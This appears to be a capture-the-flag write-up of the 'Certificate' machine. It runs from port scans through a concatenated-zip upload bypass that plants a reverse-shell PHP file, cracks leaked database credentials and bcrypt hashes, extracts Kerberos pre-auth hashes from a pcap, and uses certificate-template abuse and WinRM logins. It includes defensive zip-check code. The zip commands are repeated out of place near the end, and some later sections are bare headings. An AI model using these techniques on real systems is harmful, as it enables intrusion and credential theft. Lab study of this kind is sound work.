Information gathering
nmap
Port scan
➜ Certificate nmap --min-rate 10000 -A -p- 10.10.11.71
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-09 20:49 CST
Nmap scan report for 10.10.11.71
Host is up (0.30s latency).
Not shown: 65519 filtered tcp ports (no-response)
PORT      STATE SERVICE    VERSION
53/tcp    open  domain     (generic dns response: SERVFAIL)
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp    open  tcpwrapped
|_http-title: Did not follow redirect to http://certificate.htb/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
88/tcp    open  tcpwrapped
135/tcp   open  tcpwrapped
139/tcp   open  tcpwrapped
445/tcp   open  tcpwrapped
593/tcp   open  tcpwrapped
636/tcp   open  tcpwrapped
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
|_ssl-date: 2025-06-09T20:29:06+00:00; +7h38m17s from scanner time.
3268/tcp  open  tcpwrapped
3269/tcp  open  tcpwrapped
|_ssl-date: 2025-06-09T20:29:03+00:00; +7h38m18s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after:  2025-11-04T03:14:54
9389/tcp  open  tcpwrapped
49667/tcp open  tcpwrapped
49692/tcp open  tcpwrapped
49693/tcp open  tcpwrapped
49712/tcp open  tcpwrapped
49718/tcp open  tcpwrapped

The port set (53, 88, 135/139/445, 593, 636, 3268/3269, 9389) is a domain controller; the LDAPS certificate names it DC01.certificate.htb and the web server is XAMPP (Apache 2.4.58 on Win64 with PHP 8.0.30) redirecting to certificate.htb, so add that name to /etc/hosts. Note the clock skew of roughly +7h38m reported by ssl-date: anything Kerberos-based later on (Kerberos tickets, certipy with Kerberos auth) needs the attacking host's clock aligned with the DC, or it will fail with a clock-skew error.
dirsearch
Directory enumeration
➜ Certificate dirsearch -u http://certificate.htb/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/yefeng/桌面/HTB/Certificate/reports/http_certificate.htb/__25-06-10_21-25-58.txt

Target: http://certificate.htb/

[21:25:58] Starting:
[21:26:02] 403 -  304B  - /%C0%AE%C0%AE%C0%AF
[21:26:02] 403 -  304B  - /%3f/
[21:26:02] 403 -  304B  - /%ff
[21:26:08] 403 -  304B  - /.ht_wsr.txt
[21:26:08] 403 -  304B  - /.htaccess.bak1
[21:26:08] 403 -  304B  - /.htaccess.orig
[21:26:08] 403 -  304B  - /.htaccess.save
[21:26:08] 403 -  304B  - /.htaccess.sample
[21:26:08] 403 -  304B  - /.htaccess_sc
[21:26:08] 403 -  304B  - /.htaccess_orig
[21:26:08] 403 -  304B  - /.htaccessOLD
[21:26:08] 403 -  304B  - /.htaccess_extra
[21:26:08] 403 -  304B  - /.htaccessBAK
[21:26:08] 403 -  304B  - /.htaccessOLD2
[21:26:08] 403 -  304B  - /.htm
[21:26:08] 403 -  304B  - /.html
[21:26:08] 403 -  304B  - /.htpasswd_test
[21:26:08] 403 -  304B  - /.httr-oauth
[21:26:08] 403 -  304B  - /.htpasswds
[21:26:24] 200 -   14KB - /about.php
[21:26:49] 403 -  304B  - /cgi-bin/
[21:26:49] 500 -  638B  - /cgi-bin/printenv.pl
[21:26:56] 200 -    0B  - /db.php
[21:27:02] 503 -  404B  - /examples
[21:27:02] 503 -  404B  - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[21:27:02] 503 -  404B  - /examples/
[21:27:02] 503 -  404B  - /examples/servlets/servlet/CookieExample
[21:27:02] 503 -  404B  - /examples/jsp/snp/snoop.jsp
[21:27:02] 503 -  404B  - /examples/servlets/servlet/RequestHeaderExample
[21:27:02] 503 -  404B  - /examples/servlets/index.html
[21:27:02] 503 -  404B  - /examples/jsp/index.html
[21:27:02] 503 -  404B  - /examples/servlet/SnoopServlet
[21:27:02] 503 -  404B  - /examples/websocket/index.xhtml
[21:27:04] 200 -    3KB - /footer.php
[21:27:07] 200 -    2KB - /header.php
[21:27:10] 403 -  304B  - /index.php::$DATA
[21:27:15] 200 -    9KB - /login.php
[21:27:16] 302 -    0B  - /logout.php  ->  login.php
[21:27:28] 403 -  423B  - /phpmyadmin
[21:27:30] 403 -  423B  - /phpmyadmin/
[21:27:30] 403 -  423B  - /phpmyadmin/docs/html/index.html
[21:27:30] 403 -  423B  - /phpmyadmin/ChangeLog
[21:27:30] 403 -  423B  - /phpmyadmin/phpmyadmin/index.php
[21:27:30] 403 -  423B  - /phpmyadmin/doc/html/index.html
[21:27:30] 403 -  423B  - /phpmyadmin/index.php
[21:27:30] 403 -  423B  - /phpmyadmin/README
[21:27:30] 403 -  423B  - /phpmyadmin/scripts/setup.php
[21:27:35] 200 -   11KB - /register.php
[21:27:37] 403 -  423B  - /server-info
[21:27:37] 403 -  423B  - /server-status/
[21:27:38] 403 -  423B  - /server-status
[21:27:42] 301 -  343B  - /static  ->  http://certificate.htb/static/
[21:27:42] 301 -  345B  - /static..  ->  http://certificate.htb/static../
[21:27:50] 403 -  304B  - /Trace.axd::$DATA
[21:27:51] 302 -    0B  - /upload.php  ->  login.php
[21:27:56] 403 -  304B  - /web.config::$DATA
[21:27:56] 403 -  304B  - /webalizer
[21:27:56] 403 -  304B  - /webalizer/
There is an upload.php page, but it cannot be reached directly (it 302-redirects to login.php). There are also register and login pages, and a /db.php that answers 200 with a 0-byte body, which usually means a config/include file that only sets up a database connection. phpmyadmin and server-status are present but forbidden.
Register an account, log in, and look for functionality.
Port 80 - upload
The footer shows that the template/theme is Colorlib; that is worth a search for known CVEs, though it is not what gets used here.
After registering and logging in, look for functionality. Under Courses there is an Enroll feature; after enrolling, a Submit button appears below the course.
Clicking Submit leads to http://certificate.htb/upload.php?s_id=5,
where an assignment file is submitted (uploaded).
According to the hint on the upload page, only certain file types are accepted.
Uploading a PHP file directly fails.
This led to a technique I had not seen before: concatenated zip archives. Two references on archive tricks:
https://github.com/snyk/zip-slip-vulnerability (zip slip: path traversal through entry names)
https://perception-point.io/blog/evasive-concatenated-zip-trojan-targets-windows-users/ (concatenated zips: two complete archives glued together, and different parsers see different entries)
➜ Certificate ls
reports  reverse  test.pdf
➜ Certificate ls -al reverse   # the reverse directory holds the reverse-shell PHP
total 12
drwxrwxr-x 2 yefeng yefeng 4096 Jun 10 22:39 .
drwxrwxr-x 4 yefeng yefeng 4096 Jun 10 22:40 ..
-rw-rw-r-- 1 yefeng yefeng 2585 Jun 10 22:38 reverse.php
➜ Certificate zip test.zip test.pdf   # a harmless zip containing any benign file
  adding: test.pdf (deflated 98%)
➜ Certificate zip -r shell.zip reverse   # a second zip containing the payload directory
  adding: reverse/ (stored 0%)
  adding: reverse/reverse.php (deflated 60%)
➜ Certificate cat test.zip shell.zip > final.zip   # concatenate: harmless archive first, payload archive second
➜ Certificate ls
final.zip  reports  reverse  shell.zip  test.pdf  test.zip
Upload final.zip. The upload succeeds and a "here" link appears.
It points to the extracted location below. Both archives were unpacked, so the payload is reachable at the path matching the directory we zipped; start a listener first, then request reverse.php:
http://certificate.htb/static/uploads/7af21a959d787f761b08dac295577bdd/test.pdf
http://certificate.htb/static/uploads/7af21a959d787f761b08dac295577bdd/reverse/reverse.php
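Why the concatenation works is worth seeing in code. The following Python script is an added example (my code, not part of the original writeup or of either linked project) that rebuilds final.zip from constructed stand-ins for test.pdf and reverse.php and shows the two views a zip file has: a reader that trusts the end-of-central-directory (EOCD) record at the back of the file, as Python's zipfile does, sees only the trailing archive, while a reader that walks local file headers from the front sees every entry of both archives. Which view a given validator or extractor uses is implementation-specific; a validator and an extractor that disagree is exactly the gap this upload exploits. The last function is the server-side check a defender would want: refuse archives whose two views disagree or that carry more than one EOCD record. File contents are placeholders.

```python
import io
import struct
import zipfile

LFH_SIG = b"PK\x03\x04"   # local file header signature
EOCD_SIG = b"PK\x05\x06"  # end of central directory signature


def make_zip(entries):
    """Build an in-memory zip from {name: bytes}. Stored (uncompressed) so the
    sample bytes are predictable; a real upload would use deflate just as well."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def concat_zips(*blobs):
    """Equivalent of `cat test.zip shell.zip > final.zip`."""
    return b"".join(blobs)


def names_via_central_directory(blob):
    """View of a reader that locates the *last* EOCD record and follows its
    central directory (Python's zipfile): only the trailing archive's entries."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return zf.namelist()


def names_via_local_headers(blob):
    """View of a streaming reader that walks local file headers from the front:
    every entry of every concatenated archive."""
    names = []
    pos = 0
    while True:
        pos = blob.find(LFH_SIG, pos)
        if pos < 0:
            return names
        # 30-byte local file header: compressed size at offset 18,
        # file-name length at 26, extra-field length at 28, name at 30.
        csize = struct.unpack_from("<I", blob, pos + 18)[0]
        name_len, extra_len = struct.unpack_from("<HH", blob, pos + 26)
        names.append(blob[pos + 30:pos + 30 + name_len].decode("utf-8"))
        # Skip the entry's data too (csize is 0 when a data descriptor is used,
        # in which case the scan simply continues through the data).
        pos += 30 + name_len + extra_len + csize


def is_concatenated(blob):
    """Defensive check for an upload handler: reject an archive that carries
    more than one EOCD record or whose two views list different entries."""
    if blob.count(EOCD_SIG) != 1:
        return True
    return sorted(names_via_local_headers(blob)) != sorted(names_via_central_directory(blob))


# Constructed sample data standing in for test.pdf and reverse/reverse.php.
BENIGN = make_zip({"test.pdf": b"%PDF-1.4 harmless placeholder"})
PAYLOAD = make_zip({"reverse/reverse.php": b"<?php /* reverse shell would go here */ ?>"})
FINAL = concat_zips(BENIGN, PAYLOAD)

if __name__ == "__main__":
    print("central directory view:", names_via_central_directory(FINAL))
    print("local header view:     ", names_via_local_headers(FINAL))
    print("flagged as concatenated:", is_concatenated(FINAL))
```

The signature scan in names_via_local_headers can in principle hit the four bytes PK\x03\x04 inside compressed data, so a production check should parse the central directory properly and compare header offsets rather than rely on a raw search; for rejecting a glued-together upload the EOCD count alone is already decisive.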
shell -> Sara.b -> information
Looking around the web root, db.php stands out; dirsearch had already found it earlier (200, empty body). Reading it leaks the database credentials.
PS C:\xampp\htdocs\certificate.htb> ls

    Directory: C:\xampp\htdocs\certificate.htb

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        12/26/2024   1:49 AM                static
-a----        12/24/2024  12:45 AM           7179 about.php
-a----        12/30/2024   1:50 PM          17197 blog.php
-a----        12/30/2024   2:02 PM           6560 contacts.php
-a----        12/24/2024   6:10 AM          15381 course-details.php
-a----        12/24/2024  12:53 AM           4632 courses.php
-a----        12/23/2024   4:46 AM            549 db.php
-a----        12/22/2024  10:07 AM           1647 feature-area-2.php
-a----        12/22/2024  10:22 AM           1331 feature-area.php
-a----        12/22/2024  10:16 AM           2955 footer.php
-a----        12/23/2024   5:13 AM           2351 header.php
-a----        12/24/2024  12:52 AM           9497 index.php
-a----        12/25/2024   1:34 PM           5908 login.php
-a----        12/23/2024   5:14 AM            153 logout.php
-a----        12/24/2024   1:27 AM           5321 popular-courses-area.php
-a----        12/25/2024   1:27 PM           8240 register.php
-a----        12/28/2024  11:26 PM          10366 upload.php

PS C:\xampp\htdocs\certificate.htb> type db.php
<?php
// Database connection using PDO
try {
    $dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
    $db_user = 'certificate_webapp_user'; // Change to your DB username
    $db_passwd = 'cert!f!c@teDBPWD'; // Change to your DB password
    $options = [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ];
    $pdo = new PDO($dsn, $db_user, $db_passwd, $options);
} catch (PDOException $e) {
    die('Database connection failed: ' . $e->getMessage());
}
?>
Now find a way to query the database. The xampp directory (XAMPP is a free, open-source Apache/MySQL/PHP bundle) ships its own client, mysql.exe. The -e switch runs a query non-interactively and prints the result to the terminal, and -E prints each row vertically (one column per line), which keeps the wide users table readable in a reverse shell.
PS C:\xampp\mysql\bin> .\mysql.exe -u certificate_webapp_user -p"cert!f!c@teDBPWD" -e "use certificate_webapp_db; select * from users;" -E
*************************** 1. row ***************************
        id: 1
first_name: Lorra
 last_name: Armessa
  username: Lorra.AAA
     email: [email protected]
  password: $2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFG
created_at: 2024-12-23 12:43:10
      role: teacher
 is_active: 1
*************************** 2. row ***************************
        id: 6
first_name: Sara
 last_name: Laracrof
  username: Sara1200
     email: [email protected]
  password: $2y$04$pgTOAkSnYMQoILmL6MRXLOOfFlZUPR4lAD2kvWZj.i/dyvXNSqCkK
created_at: 2024-12-23 12:47:11
      role: teacher
 is_active: 1
*************************** 3. row ***************************
        id: 7
first_name: John
 last_name: Wood
  username: Johney
     email: [email protected]
  password: $2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRq
created_at: 2024-12-23 13:18:18
      role: student
 is_active: 1
*************************** 4. row ***************************
        id: 8
first_name: Havok
 last_name: Watterson
  username: havokww
     email: [email protected]
  password: $2y$04$XSXoFSfcMoS5Zp8ojTeUSOj6ENEun6oWM93mvRQgvaBufba5I5nti
created_at: 2024-12-24 09:08:04
      role: teacher
 is_active: 1
*************************** 5. row ***************************
        id: 9
first_name: Steven
 last_name: Roman
  username: stev
     email: [email protected]
  password: $2y$04$6FHP.7xTHRGYRI9kRIo7deUHz0LX.vx2ixwv0cOW6TDtRGgOhRFX2
created_at: 2024-12-24 12:05:05
      role: student
 is_active: 1
*************************** 6. row ***************************
        id: 10
first_name: Sara
 last_name: Brawn
  username: sara.b
     email: [email protected]
  password: $2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6
created_at: 2024-12-25 21:31:26
      role: admin
 is_active: 1
*************************** 7. row ***************************
        id: 12
first_name: a
 last_name: a
  username: test
     email: [email protected]
  password: $2y$04$vwe.PPbSkbpE8PUUlTlXUu33rl7SNaDQrbZSomfpknEXtOgxeilly
created_at: 2025-06-12 13:16:01
      role: student
 is_active: 1
*************************** 8. row ***************************
        id: 13
first_name: Kali
 last_name: Kalki
  username: Kali
     email: [email protected]
  password: $2y$04$hfaMKHRnCcSRI04qiWK1auFkdDFhMAaRlPDtH0WfgKZGouda5590K
created_at: 2025-06-12 13:18:13
      role: student
 is_active: 1
PS C:\Users> ls

    Directory: C:\Users

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        12/30/2024   8:33 PM                Administrator
d-----        11/23/2024   6:59 PM                akeder.kh
d-----         11/4/2024  12:55 AM                Lion.SK
d-r---         11/3/2024   1:05 AM                Public
d-----         11/3/2024   7:26 PM                Ryan.K
d-----        11/26/2024   4:12 PM                Sara.B
d-----        12/29/2024   5:30 PM                xamppuser
Sara.B has a profile on the box and also appears in the web database as sara.b with the admin role, so her hash is the one to crack first. The hashes are bcrypt ($2y$) with cost 04, i.e. only 16 rounds, which makes a rockyou run cheap.
hashcat -> Sara.b
  username: sara.b
     email: [email protected]
  password: $2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6

➜ Certificate hashcat -m 3200 -a 0 hash /usr/share/wordlists/rockyou.txt --show
$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6:Blink182

# verify the password against the domain with crackmapexec (cme)
➜ Certificate crackmapexec winrm 10.10.11.71 -u sara.b -p 'Blink182'
SMB         10.10.11.71     5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certificate.htb)
HTTP        10.10.11.71     5985   DC01             [*] http://10.10.11.71:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.11.71     5985   DC01             [+] certificate.htb\sara.b:Blink182 (Pwn3d!)

The password is reused as the domain password, and WinRM (5985, which the earlier port scan did not show) accepts it.
Evil-winrm
➜ Certificate evil-winrm -i dc01.certificate.htb -u sara.b -p 'Blink182'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Sara.B\Documents> whoami
certificate\sara.b
After connecting there is no user.txt, so this account is not enough; keep gathering information and moving laterally.
Documents contains a WS-01 folder with a description file and a pcap capture.
*Evil-WinRM* PS C:\Users\Sara.B\Documents> ls

    Directory: C:\Users\Sara.B\Documents

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         11/4/2024  12:53 AM                WS-01

*Evil-WinRM* PS C:\Users\Sara.B\Documents> cd WS-01
*Evil-WinRM* PS C:\Users\Sara.B\Documents\WS-01> dir

    Directory: C:\Users\Sara.B\Documents\WS-01

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         11/4/2024  12:44 AM            530 Description.txt
-a----         11/4/2024  12:45 AM         296660 WS-01_PktMon.pcap

*Evil-WinRM* PS C:\Users\Sara.B\Documents\WS-01> download WS-01_PktMon.pcap .

Info: Downloading C:\Users\Sara.B\Documents\WS-01\WS-01_PktMon.pcap to WS-01_PktMon.pcap

Info: Download successful!
Open it in Wireshark. It is mostly SMB2 and Kerberos (krb5) traffic, i.e. a workstation authenticating to the domain. The Kerberos AS-REQ messages carry PA-ENC-TIMESTAMP pre-authentication data: a timestamp encrypted with a key derived from the user's password, which can be attacked offline.
This project assembles hashcat-format hashes from the AS-REQ pre-auth data in the capture:
https://github.com/jalvarezz13/Krb5RoastParser
The realm field of the resulting hash line had to be fixed by hand by adding the .HTB suffix (CERTIFICATE.HTB rather than CERTIFICATE). This matters because for the AES etypes (17/18) the realm is part of the string-to-key salt, so with a wrong realm hashcat can never reproduce the key even when the right password is in the wordlist.
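The following Python is an added example (my code, not Krb5RoastParser's) of assembling and repairing that hashcat line for the AES pre-auth etypes, and of the salt that makes the realm suffix matter. The principal Lion.SK and realm CERTIFICATE.HTB follow the writeup; the cipher hex is a constructed placeholder, not bytes from the real capture.

```python
import re

# hashcat modes for Kerberos 5 AS-REQ pre-auth (PA-ENC-TIMESTAMP) with AES etypes
HASHCAT_MODE = {17: 19800,   # aes128-cts-hmac-sha1-96
                18: 19900}   # aes256-cts-hmac-sha1-96


def krb5pa_salt(realm, principal):
    """Default string-to-key salt for etype 17/18 (RFC 3962): the realm,
    upper-cased, directly followed by the principal name. The password is fed
    to PBKDF2 with this salt, so a realm missing its DNS suffix can never
    reproduce the real key, whatever the wordlist contains."""
    return realm.upper() + principal


def build_krb5pa_hash(etype, principal, realm, cipher_hex):
    """Assemble the hashcat line for an AES pre-auth blob taken from an AS-REQ.
    principal must be copied from cname exactly (case matters, see the salt);
    cipher_hex is EncryptedData.cipher: ciphertext followed by the 12-byte HMAC."""
    if etype not in HASHCAT_MODE:
        raise ValueError(f"etype {etype} is not an AES pre-auth type handled here")
    if not re.fullmatch(r"(?:[0-9a-fA-F]{2})+", cipher_hex):
        raise ValueError("cipher must be an even-length hex string")
    if len(cipher_hex) < 2 * (16 + 12):   # at least one AES block plus HMAC-SHA1-96
        raise ValueError("cipher too short for AES-CTS + HMAC")
    return f"$krb5pa${etype}${principal}${realm}${cipher_hex.lower()}"


def fix_realm(hash_line, full_realm):
    """Repair a line whose realm field lacks the suffix (CERTIFICATE instead of
    CERTIFICATE.HTB). Only the realm field changes; principal and cipher stay."""
    parts = hash_line.split("$")   # ['', 'krb5pa', etype, principal, realm, cipher]
    if len(parts) != 6 or parts[1] != "krb5pa" or parts[2] not in ("17", "18"):
        raise ValueError("not an AES $krb5pa$ line")
    parts[4] = full_realm
    return "$".join(parts)


def mode_for(hash_line):
    """Pick the hashcat -m value from the etype embedded in the line."""
    return HASHCAT_MODE[int(hash_line.split("$")[2])]


# Constructed stand-in: principal and realm follow the writeup, the cipher
# bytes are a placeholder rather than data from the real capture.
SAMPLE = build_krb5pa_hash(18, "Lion.SK", "CERTIFICATE", "ab" * 40)

if __name__ == "__main__":
    print(SAMPLE)
    fixed = fix_realm(SAMPLE, "CERTIFICATE.HTB")
    print(fixed)
    print("salt:", krb5pa_salt("CERTIFICATE.HTB", "Lion.SK"), "hashcat -m", mode_for(fixed))
```

The RC4 pre-auth type (etype 23, hashcat mode 7500) uses a different line layout with an extra salt field and is deliberately not handled here; check the etype in the AS-REQ before choosing the mode.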
hashcat -> Lion.SK
shell -> Lion.SK -> user.txt
Logging in as this user (Lion.SK, with the password recovered from the pre-auth hash) gives user.txt, which sits on the Desktop.
BloodHound
Collect domain information with BloodHound.
Import the collector's zip into BloodHound.
Lion.SK is a member of the DOMAIN CRA MANAGERS group,
which exists to issue and revoke certificates, i.e. it has rights over the AD CS infrastructure.
Try certipy to work with the CA and templates. Remember the clock skew from the port scan: Kerberos-authenticated certipy operations need the attacker's clock aligned with the DC.
certipy
ESC3 is the enrollment-agent abuse: a template that grants the Certificate Request Agent EKU lets its holder request certificates on behalf of other users from a second template that accepts agent-signed requests. The first attempt at ESC3 failed here.
Ryan.K is a member of DOMAIN STORAGE MANAGERS, so the ESC3 attack can be pointed at that user instead, obtaining a certificate in Ryan.K's name.
shell -> Ryan.k
SeManageVolumePrivilege
Privilege ---> https://github.com/CsEnox/SeManageVolumeExploit
➜ Certificate ls
reports reverse test.pdf
➜ Certificate ls -al reverse # the reverse directory holds the reverse-shell payload
总计 12
drwxrwxr-x 2 yefeng yefeng 4096 6月10日 22:39 .
drwxrwxr-x 4 yefeng yefeng 4096 6月10日 22:40 ..
-rw-rw-r-- 1 yefeng yefeng 2585 6月10日 22:38 reverse.php
➜ Certificate zip test.zip test.pdf # build a harmless zip containing any ordinary file
 adding: test.pdf (deflated 98%)
➜ Certificate zip -r shell.zip reverse # zip the folder that holds the payload
 adding: reverse/ (stored 0%)
 adding: reverse/reverse.php (deflated 60%)
➜ Certificate cat test.zip shell.zip > final.zip # append the harmless zip and the malicious zip, in that order, into the final zip
➜ Certificate ls
final.zip reports reverse shell.zip test.pdf test.zip
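A defender-side check for the concatenated-zip trick shown above, added here as an example and not taken from the original writeup: it walks every local file header physically present in the upload and compares that with what Python's zipfile reads (zipfile follows the last end-of-central-directory record, so it sees only the appended archive). The two sample archives are constructed inline; the file names mirror the writeup's test.pdf and reverse/reverse.php.

```python
"""Flag uploads that are two ZIP archives glued together (cat a.zip b.zip).
Added example, not code from the original writeup."""
import io
import struct
import zipfile

LOCAL_SIG = b"PK\x03\x04"   # local file header signature
EOCD_SIG = b"PK\x05\x06"    # end of central directory; a real archive has one


def list_local_headers(data: bytes) -> list:
    """Walk every local file header physically present in the blob, whether
    or not any central directory references it."""
    names, pos = [], data.find(LOCAL_SIG)
    while pos != -1 and pos + 30 <= len(data):
        # header: sig(4) ver(2) flags(2) method(2) time(2) date(2) crc(4)
        #         csize(4) usize(4) namelen(2) extralen(2) name extra data
        csize, _usize, namelen, extralen = struct.unpack_from("<IIHH", data, pos + 18)
        names.append(data[pos + 30:pos + 30 + namelen].decode("utf-8", "replace"))
        # skip the entry's data; entries written with a data descriptor carry
        # csize 0 here, in which case scanning simply resumes after the header
        pos = data.find(LOCAL_SIG, pos + 30 + namelen + extralen + csize)
    return names


def inspect_upload(data: bytes) -> dict:
    """Compare what a standard reader sees (zipfile locates the *last* EOCD
    by scanning from the end) with every local header in the blob."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        visible = zf.namelist()
    physical = list_local_headers(data)
    unreferenced = sorted(set(physical) - set(visible))
    eocd = data.count(EOCD_SIG)
    return {"eocd_records": eocd, "visible": visible, "physical": physical,
            "unreferenced": unreferenced,
            "suspicious": eocd != 1 or bool(unreferenced)}


def _zip(name: str, content: bytes) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, content)
    return buf.getvalue()


# constructed samples: a harmless archive, and the same archive with a second
# one appended, mirroring the writeup's final.zip
CLEAN_SAMPLE = _zip("test.pdf", b"%PDF-1.4 constructed sample")
CONCAT_SAMPLE = CLEAN_SAMPLE + _zip("reverse/reverse.php", b"<?php /* placeholder */ ?>")

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_SAMPLE), ("concatenated", CONCAT_SAMPLE)):
        print(label, inspect_upload(blob))
```

An upload handler that rejects any blob with more than one EOCD record, or with local headers its own reader never lists, closes the gap between the scanner's view and the extractor's view.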
Forging
Evil-winrm -> administrator